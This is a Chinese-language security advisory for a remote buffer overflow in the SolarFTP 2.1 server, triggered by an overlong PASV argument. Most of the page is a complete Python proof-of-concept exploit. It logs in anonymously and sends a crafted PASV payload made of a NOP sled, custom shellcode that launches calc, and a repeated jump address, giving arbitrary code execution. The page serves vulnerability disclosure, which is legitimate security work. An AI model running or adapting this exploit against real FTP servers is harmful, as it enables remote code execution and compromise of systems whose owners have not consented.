SolarFTP服务器"PASV"命令远程缓冲区溢出漏洞
发布日期:2011-01-10
更新日期:2011-01-13
受影响系统:SolarFTP SolarFTP 2.1
描述:
BUGTRAQ ID:
45748
SolarFTP是易于使用的个人FTP服务器。
SolarFTP在处理"PASV"命令时存在漏洞,远程攻击者可利用此漏洞在受影响的应用程序中执行任意代码或造成拒绝服务。
要利用此漏洞可向"PASV"命令传递超长的参数。
<*来源:John Leitch
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# ------------------------------------------------------------------------
# Software................Solar FTP Server 2.1
# Vulnerability...........Buffer Overflow
# Download................
http://www.solarftp.com/
# Release Date............1/10/2011
# Tested On...............Windows XP SP3 EN
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................
http://www.johnleitch.net/
#
Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A buffer overflow in Solar FTP Server 2.1 can be exploited to execute
# arbitrary code.
#
#
# --PoC--
import socket
host = 'localhost'
port = 21
jmp_eax = '\xBF\x66\x02\x10'
junk = '\xCC\xCC\xCC\xCC'
nop_sled = '\x90\x90\x90' + '\x90\x90\x90\x90' * 2
# Calc shellcode by yours truly. Check the task manager
# as the calc instance will not be visible.
shell_code = "\x31\xC9"\
"\x51"\
"\x68\x63\x61\x6C\x63"\
"\x54"\
"\xB8\xC7\x93\xC2\x77"\
"\xFF\xD0"
junk2 = 'A' * 7004
bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
print 'connecting'
s.connect((host, port))
print s.recv(8192)
s.send('USER anonymous\r\n')
print s.recv(8192)
s.send('PASS x@x.com\r\n')
print s.recv(8192)
s.send('PASV ' + bad_stuff + '\r\n')
print s.recv(8192)
s.close()
建议:
厂商补丁:
SolarFTP
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.solarftp.com/浏览次数:3261
严重程度:0(网友投票)
